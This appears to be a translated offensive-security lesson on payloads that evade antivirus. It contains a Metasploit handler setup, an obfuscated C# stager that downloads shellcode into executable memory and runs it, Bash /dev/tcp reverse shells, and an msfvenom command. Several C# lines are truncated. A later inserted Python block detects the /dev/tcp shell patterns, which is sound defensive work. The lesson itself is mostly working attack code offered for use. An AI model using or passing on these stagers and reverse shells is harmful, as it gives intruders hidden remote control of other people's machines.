In real engagements you will run into all kinds of payload requirements and practical obstacles: antivirus, firewall filtering, only specific ports or channels being reachable, tunnelling, and so on. This lesson extends part of Lesson 10; the rest will be covered later.

This time the additions are C# and Bash.

PS: online code highlighter: http://tool.oschina.net/highlight

1. C# payload

Handler setup in msfconsole:

    msf > use exploit/multi/handler
    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(handler) > set LHOST 192.168.1.107
    LHOST => 192.168.1.107

Obfuscated version (several lines were cut short in the extraction; those spots are marked in comments and left as they are):

    using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices; using System.   // last using directive cut off in the source
    namespace RkfCHtll { class LiNGeDokqnEH {
    // Stager: connect to the handler, read a 4-byte length prefix, then read the staged payload into a buffer
    static byte[] idCWVw(string VVUUJUQytjlL, int eMcukOUqFuHbUv) {
    IPEndPoint nlttgWAMdEQgAo = new IPEndPoint(IPAddress.Parse(VVUUJUQytjlL), eMcukOUqFuHbUv);
    Socket fzTiwdk = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
    try { fzTiwdk.Connect(nlttgWAMdEQgAo);}
    catch { return null;}
    byte[] gJVVagJmu = new byte[4];
    fzTiwdk.Receive(gJVVagJmu, 4, 0);
    int GFxHorfhzft = BitConverter.ToInt32(gJVVagJmu, 0);
    byte[] mwxyRsYNn = new byte[GFxHorfhzft + 5];
    int yVcZAEmXaMszAc = 0;
    while (yVcZAEmXaMszAc < GFxHorfhzft)
    { yVcZAEmXaMszAc += fzTiwdk.Receive(mwxyRsYNn,yVcZAEmXaMszAc + 5, (GFxHorfhzft - yVcZAEmXaMszAc) < 4096   // rest of the receive loop cut off in the source
    byte[] XEvFDc = BitConverter.GetBytes((int)fzTiwdk.Handle);
    Array.Copy(XEvFDc, 0, mwxyRsYNn, 1, 4); mwxyRsYNn[0] = 0xBF;   // 5-byte prefix (0xBF = mov edi, imm32) hands the socket handle to the stage so it reuses the connection
    return mwxyRsYNn;}
    // Loader: copy the buffer into newly allocated RWX memory (0x40 = PAGE_EXECUTE_READWRITE) and run it on a new thread
    static void hcvPkmyIZ(byte[] fPnfqu) {
    if (fPnfqu != null) {
    UInt32 hcoGPUltNcjK = VirtualAlloc(0,(UInt32)fPnfqu.Length, 0x1000, 0x40);
    Marshal.Copy(fPnfqu, 0, (IntPtr)(hcoGPUltNcjK), fPnfqu.Length);
    IntPtr xOxEPnqW = IntPtr.Zero;
    UInt32 ooiiZLMzO = 0;
    IntPtr wxPyud = IntPtr.Zero;
    xOxEPnqW = CreateThread(0, 0, hcoGPUltNcjK, wxPyud, 0, ref ooiiZLMzO);
    WaitForSingleObject(xOxEPnqW, 0xFFFFFFFF); }}
    static void Main(){
    byte[] dCwAid = null; dCwAid = idCWVw("xx.xx.xx.xx", xx);   // handler IP and port placeholders
    hcvPkmyIZ(dCwAid); }
    [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 qWBbOS,UInt32 HoKzSHMU, UInt   // declaration cut off in the source
    [DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 tqUXybrozZ, UInt32 FMmVpwin, UInt32 H   // declaration cut off in the source
    [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr CApwDwK, UInt32 uzGJUddCYTd);

[Figure 1]

2. Bash payload

Interactive shell with all three standard streams bound to a /dev/tcp socket:

    bash -i >& /dev/tcp/xx.xx.xx.xx/xx 0>&1

[Figure 2]

Variant that opens a read/write descriptor on the socket and executes each line received over it:

    exec 5<>/dev/tcp/xx.xx.xx.xx/xx
    cat <&5 | while read line; do $line 2>&5 >&5;done

[Figure 3]
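A detection check for the two /dev/tcp reverse-shell shapes above, added here as an example and not part of the original lesson: it scans a constructed shell-session log (the kind of command lines an auditd or shell-history collector would emit) and correlates the `exec 5<>` socket open with the later read-and-execute loop, while rating a one-way /dev/tcp connectivity check lower. The severity labels, regexes and sample lines are this example's own assumptions.

```python
import re

# Two shapes of /dev/tcp reverse shell from the lesson: an interactive shell with
# all three standard streams bound to the socket, and a read/write fd opened with
# "exec N<>" that a later command executes received lines from.
DEV_TCP = re.compile(r"/dev/(?:tcp|udp)/(?P<host>[^/\s]+)/(?P<port>\d+|xx)")
INTERACTIVE_SHELL = re.compile(r"\b(?:ba|z|k|da)?sh\s+-\w*i\b")
STDIN_FROM_STDOUT = re.compile(r"\b0\s*[<>]&\s*1\b")          # 0>&1 or 0<&1
OPEN_RW_FD = re.compile(r"\bexec\s+(?P<fd>\d+)\s*<>\s*/dev/(?:tcp|udp)/")
EXEC_READ_LOOP = re.compile(r"while\s+read\b.*\bdo\b.*\$\w+")  # runs each line read
FD_REDIRECT = re.compile(r"[<>]&\s*(\d+)")                      # fd numbers referenced

def classify(cmd: str, open_fds: dict[str, str]) -> tuple[str, str]:
    """Rate one command line. open_fds (fd -> host:port) carries state across the
    session so the exec/loop pair on separate lines is still correlated."""
    m = OPEN_RW_FD.search(cmd)
    if m:
        ep = DEV_TCP.search(cmd)
        open_fds[m["fd"]] = f"{ep['host']}:{ep['port']}" if ep else "?"
        return "medium", f"read/write socket opened on fd {m['fd']} via /dev/tcp"
    if DEV_TCP.search(cmd):
        if INTERACTIVE_SHELL.search(cmd) and STDIN_FROM_STDOUT.search(cmd):
            return "high", "interactive shell with stdin/stdout/stderr bound to /dev/tcp"
        return "low", "one-way /dev/tcp use (often a connectivity check)"
    if EXEC_READ_LOOP.search(cmd):
        hit = set(FD_REDIRECT.findall(cmd)) & set(open_fds)
        if hit:
            fd = min(hit)
            return "high", f"executes lines read from socket fd {fd} ({open_fds[fd]})"
    return "none", ""

def scan_session(commands: list[str]) -> list[tuple[str, str, str]]:
    """Return (severity, command, reason) for every flagged line of one session."""
    open_fds: dict[str, str] = {}
    findings = []
    for cmd in commands:
        sev, why = classify(cmd, open_fds)
        if sev != "none":
            findings.append((sev, cmd, why))
    return findings

# Constructed sample session (not real telemetry); the xx placeholders are the lesson's.
SAMPLE_SESSION = [
    "ls -la /var/log",
    "echo > /dev/tcp/db.internal/5432",
    "bash -i >& /dev/tcp/xx.xx.xx.xx/xx 0>&1",
    "exec 5<>/dev/tcp/xx.xx.xx.xx/xx",
    "cat <&5 | while read line; do $line 2>&5 >&5;done",
]
```

Running `scan_session(SAMPLE_SESSION)` flags four of the five lines; the plain `ls` is ignored and the `echo` connectivity check is rated low rather than high.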

Appendix:

Generating the Bash payload with msfvenom:

    root@John:~# msfvenom -p cmd/unix/reverse_bash LHOST=xx.xx.xx.xx LPORT=xx -f raw > payload.sh

For a wrapper with simplified parameters, see the msfvenom payload creator project:
https://github.com/g0tmi1k/mpc
[Figure 4]

Micropoor